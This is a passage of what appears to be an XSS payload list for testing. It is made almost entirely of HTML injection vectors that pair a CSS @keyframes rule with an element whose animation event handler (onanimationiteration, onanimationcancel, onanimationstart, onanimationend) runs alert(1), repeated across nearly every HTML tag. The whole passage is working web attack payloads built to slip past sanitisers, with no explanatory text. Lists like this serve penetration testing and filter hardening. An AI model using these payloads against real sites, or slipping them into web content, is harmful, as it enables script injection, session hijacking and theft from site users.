style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strong> +<style>@keyframes slidein {}</style><style style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></style> +<style>@keyframes slidein {}</style><sub style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sub> +<style>@keyframes slidein {}</style><summary style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></summary> +<style>@keyframes slidein {}</style><sup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sup> +<style>@keyframes slidein {}</style><svg style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></svg> +<style>@keyframes slidein {}</style><table style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></table> +<style>@keyframes slidein {}</style><tbody style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tbody> +<style>@keyframes slidein {}</style><td style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></td> +<style>@keyframes slidein {}</style><template style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></template> +<style>@keyframes slidein {}</style><textarea style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></textarea> +<style>@keyframes slidein {}</style><tfoot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tfoot> +<style>@keyframes slidein {}</style><th 
style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></th> +<style>@keyframes slidein {}</style><thead style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></thead> +<style>@keyframes slidein {}</style><time style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></time> +<style>@keyframes slidein {}</style><title style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></title> +<style>@keyframes slidein {}</style><tr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tr> +<style>@keyframes slidein {}</style><track style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></track> +<style>@keyframes slidein {}</style><tt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tt> +<style>@keyframes slidein {}</style><u style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></u> +<style>@keyframes slidein {}</style><ul style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ul> +<style>@keyframes slidein {}</style><var style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></var> +<style>@keyframes slidein {}</style><video style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></video> +<style>@keyframes slidein {}</style><wbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></wbr> +<style>@keyframes slidein {}</style><xmp 
style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xmp> +<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><abbr id=x style="position:absolute;" onanimationcancel="alert(1)"></abbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><acronym id=x style="position:absolute;" onanimationcancel="alert(1)"></acronym> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style="position:absolute;" onanimationcancel="alert(1)"></address> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><applet id=x style="position:absolute;" onanimationcancel="alert(1)"></applet> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><area id=x style="position:absolute;" onanimationcancel="alert(1)"></area> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style="position:absolute;" onanimationcancel="alert(1)"></article> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><aside id=x style="position:absolute;" onanimationcancel="alert(1)"></aside> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style="position:absolute;" onanimationcancel="alert(1)"></audio> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s 
ease-in-out 0s 1 x;}</style><b id=x style="position:absolute;" onanimationcancel="alert(1)"></b> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style="position:absolute;" onanimationcancel="alert(1)"></base> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><basefont id=x style="position:absolute;" onanimationcancel="alert(1)"></basefont> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdi id=x style="position:absolute;" onanimationcancel="alert(1)"></bdi> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style="position:absolute;" onanimationcancel="alert(1)"></bdo> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bgsound id=x style="position:absolute;" onanimationcancel="alert(1)"></bgsound> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style="position:absolute;" onanimationcancel="alert(1)"></big> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blink id=x style="position:absolute;" onanimationcancel="alert(1)"></blink> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blockquote id=x style="position:absolute;" onanimationcancel="alert(1)"></blockquote> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style="position:absolute;" onanimationcancel="alert(1)"></body> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style="position:absolute;" onanimationcancel="alert(1)"></br> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s 
ease-in-out 0s 1 x;}</style><button id=x style="position:absolute;" onanimationcancel="alert(1)"></button> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style="position:absolute;" onanimationcancel="alert(1)"></canvas> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><caption id=x style="position:absolute;" onanimationcancel="alert(1)"></caption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><center id=x style="position:absolute;" onanimationcancel="alert(1)"></center> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style="position:absolute;" onanimationcancel="alert(1)"></cite> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style="position:absolute;" onanimationcancel="alert(1)"></code> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><col id=x style="position:absolute;" onanimationcancel="alert(1)"></col> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><colgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></colgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style="position:absolute;" onanimationcancel="alert(1)"></command> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><content id=x style="position:absolute;" onanimationcancel="alert(1)"></content> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><data id=x style="position:absolute;" onanimationcancel="alert(1)"></data> +<style>@keyframes x{from {left:0;}to {left: 
1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style="position:absolute;" onanimationcancel="alert(1)"></datalist> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dd id=x style="position:absolute;" onanimationcancel="alert(1)"></dd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><del id=x style="position:absolute;" onanimationcancel="alert(1)"></del> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style="position:absolute;" onanimationcancel="alert(1)"></details> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dfn id=x style="position:absolute;" onanimationcancel="alert(1)"></dfn> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style="position:absolute;" onanimationcancel="alert(1)"></dialog> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style="position:absolute;" onanimationcancel="alert(1)"></dir> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><div id=x style="position:absolute;" onanimationcancel="alert(1)"></div> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dl id=x style="position:absolute;" onanimationcancel="alert(1)"></dl> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dt id=x style="position:absolute;" onanimationcancel="alert(1)"></dt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style="position:absolute;" onanimationcancel="alert(1)"></element> +<style>@keyframes x{from {left:0;}to {left: 
1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><em id=x style="position:absolute;" onanimationcancel="alert(1)"></em> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style="position:absolute;" onanimationcancel="alert(1)"></embed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><fieldset id=x style="position:absolute;" onanimationcancel="alert(1)"></fieldset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figcaption id=x style="position:absolute;" onanimationcancel="alert(1)"></figcaption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figure id=x style="position:absolute;" onanimationcancel="alert(1)"></figure> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><font id=x style="position:absolute;" onanimationcancel="alert(1)"></font> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style="position:absolute;" onanimationcancel="alert(1)"></footer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style="position:absolute;" onanimationcancel="alert(1)"></form> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style="position:absolute;" onanimationcancel="alert(1)"></frame> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frameset id=x style="position:absolute;" onanimationcancel="alert(1)"></frameset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><h1 id=x style="position:absolute;" onanimationcancel="alert(1)"></h1> +<style>@keyframes x{from 
{left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><head id=x style="position:absolute;" onanimationcancel="alert(1)"></head> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style="position:absolute;" onanimationcancel="alert(1)"></header> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></hgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hr id=x style="position:absolute;" onanimationcancel="alert(1)"></hr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style="position:absolute;" onanimationcancel="alert(1)"></html> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style="position:absolute;" onanimationcancel="alert(1)"></i> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style="position:absolute;" onanimationcancel="alert(1)"></iframe> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style="position:absolute;" onanimationcancel="alert(1)"></image> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><img id=x style="position:absolute;" onanimationcancel="alert(1)"></img> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input id=x style="position:absolute;" onanimationcancel="alert(1)"></input> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ins id=x style="position:absolute;" onanimationcancel="alert(1)"></ins> +<style>@keyframes x{from {left:0;}to 
{left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><isindex id=x style="position:absolute;" onanimationcancel="alert(1)"></isindex> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style="position:absolute;" onanimationcancel="alert(1)"></kbd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><keygen id=x style="position:absolute;" onanimationcancel="alert(1)"></keygen> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><label id=x style="position:absolute;" onanimationcancel="alert(1)"></label> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><legend id=x style="position:absolute;" onanimationcancel="alert(1)"></legend> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><li id=x style="position:absolute;" onanimationcancel="alert(1)"></li> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><link id=x style="position:absolute;" onanimationcancel="alert(1)"></link> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><listing id=x style="position:absolute;" onanimationcancel="alert(1)"></listing> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><main id=x style="position:absolute;" onanimationcancel="alert(1)"></main> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style="position:absolute;" onanimationcancel="alert(1)"></map> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style="position:absolute;" onanimationcancel="alert(1)"></mark> +<style>@keyframes x{from {left:0;}to 
{left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style="position:absolute;" onanimationcancel="alert(1)"></marquee> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menu id=x style="position:absolute;" onanimationcancel="alert(1)"></menu> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style="position:absolute;" onanimationcancel="alert(1)"></menuitem> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meta id=x style="position:absolute;" onanimationcancel="alert(1)"></meta> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meter id=x style="position:absolute;" onanimationcancel="alert(1)"></meter> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><multicol id=x style="position:absolute;" onanimationcancel="alert(1)"></multicol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style="position:absolute;" onanimationcancel="alert(1)"></nav> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style="position:absolute;" onanimationcancel="alert(1)"></nextid> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nobr id=x style="position:absolute;" onanimationcancel="alert(1)"></nobr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noembed id=x style="position:absolute;" onanimationcancel="alert(1)"></noembed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noframes id=x style="position:absolute;" onanimationcancel="alert(1)"></noframes> 
+<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style="position:absolute;" onanimationcancel="alert(1)"></noscript> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><object id=x style="position:absolute;" onanimationcancel="alert(1)"></object> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style="position:absolute;" onanimationcancel="alert(1)"></ol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><optgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></optgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><option id=x style="position:absolute;" onanimationcancel="alert(1)"></option> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><output id=x style="position:absolute;" onanimationcancel="alert(1)"></output> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><p id=x style="position:absolute;" onanimationcancel="alert(1)"></p> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><param id=x style="position:absolute;" onanimationcancel="alert(1)"></param> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><picture id=x style="position:absolute;" onanimationcancel="alert(1)"></picture> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><plaintext id=x style="position:absolute;" onanimationcancel="alert(1)"></plaintext> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><pre id=x style="position:absolute;" 
onanimationcancel="alert(1)"></pre> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><progress id=x style="position:absolute;" onanimationcancel="alert(1)"></progress> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><q id=x style="position:absolute;" onanimationcancel="alert(1)"></q> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style="position:absolute;" onanimationcancel="alert(1)"></rb> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style="position:absolute;" onanimationcancel="alert(1)"></rp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style="position:absolute;" onanimationcancel="alert(1)"></rt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rtc id=x style="position:absolute;" onanimationcancel="alert(1)"></rtc> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ruby id=x style="position:absolute;" onanimationcancel="alert(1)"></ruby> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><s id=x style="position:absolute;" onanimationcancel="alert(1)"></s> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style="position:absolute;" onanimationcancel="alert(1)"></samp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><script id=x style="position:absolute;" onanimationcancel="alert(1)"></script> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><section id=x style="position:absolute;" 
onanimationcancel="alert(1)"></section> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style="position:absolute;" onanimationcancel="alert(1)"></select> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><shadow id=x style="position:absolute;" onanimationcancel="alert(1)"></shadow> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style="position:absolute;" onanimationcancel="alert(1)"></slot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><small id=x style="position:absolute;" onanimationcancel="alert(1)"></small> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><source id=x style="position:absolute;" onanimationcancel="alert(1)"></source> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><spacer id=x style="position:absolute;" onanimationcancel="alert(1)"></spacer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><span id=x style="position:absolute;" onanimationcancel="alert(1)"></span> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strike id=x style="position:absolute;" onanimationcancel="alert(1)"></strike> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strong id=x style="position:absolute;" onanimationcancel="alert(1)"></strong> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><style id=x style="position:absolute;" onanimationcancel="alert(1)"></style> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sub id=x 
style="position:absolute;" onanimationcancel="alert(1)"></sub> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><summary id=x style="position:absolute;" onanimationcancel="alert(1)"></summary> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style="position:absolute;" onanimationcancel="alert(1)"></sup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><svg id=x style="position:absolute;" onanimationcancel="alert(1)"></svg> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><table id=x style="position:absolute;" onanimationcancel="alert(1)"></table> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tbody id=x style="position:absolute;" onanimationcancel="alert(1)"></tbody> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style="position:absolute;" onanimationcancel="alert(1)"></td> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style="position:absolute;" onanimationcancel="alert(1)"></template> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><textarea id=x style="position:absolute;" onanimationcancel="alert(1)"></textarea> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tfoot id=x style="position:absolute;" onanimationcancel="alert(1)"></tfoot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><th id=x style="position:absolute;" onanimationcancel="alert(1)"></th> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x 
style="position:absolute;" onanimationcancel="alert(1)"></thead> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style="position:absolute;" onanimationcancel="alert(1)"></time> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><title id=x style="position:absolute;" onanimationcancel="alert(1)"></title> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tr id=x style="position:absolute;" onanimationcancel="alert(1)"></tr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style="position:absolute;" onanimationcancel="alert(1)"></track> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tt id=x style="position:absolute;" onanimationcancel="alert(1)"></tt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style="position:absolute;" onanimationcancel="alert(1)"></u> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style="position:absolute;" onanimationcancel="alert(1)"></ul> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><var id=x style="position:absolute;" onanimationcancel="alert(1)"></var> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style="position:absolute;" onanimationcancel="alert(1)"></video> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><wbr id=x style="position:absolute;" onanimationcancel="alert(1)"></wbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xmp id=x style="position:absolute;" 
onanimationcancel="alert(1)"></xmp> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationend="alert(1)"></abbr> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationstart="alert(1)"></abbr> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationend="alert(1)"></acronym> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationstart="alert(1)"></acronym> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationend="alert(1)"></address> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationstart="alert(1)"></address> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationend="alert(1)"></applet> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationstart="alert(1)"></applet> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationend="alert(1)"></area> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationstart="alert(1)"></area> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationend="alert(1)"></article> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationstart="alert(1)"></article> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationend="alert(1)"></aside> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationstart="alert(1)"></aside> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationend="alert(1)"></audio> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationstart="alert(1)"></audio> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationend="alert(1)"></b> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b> 
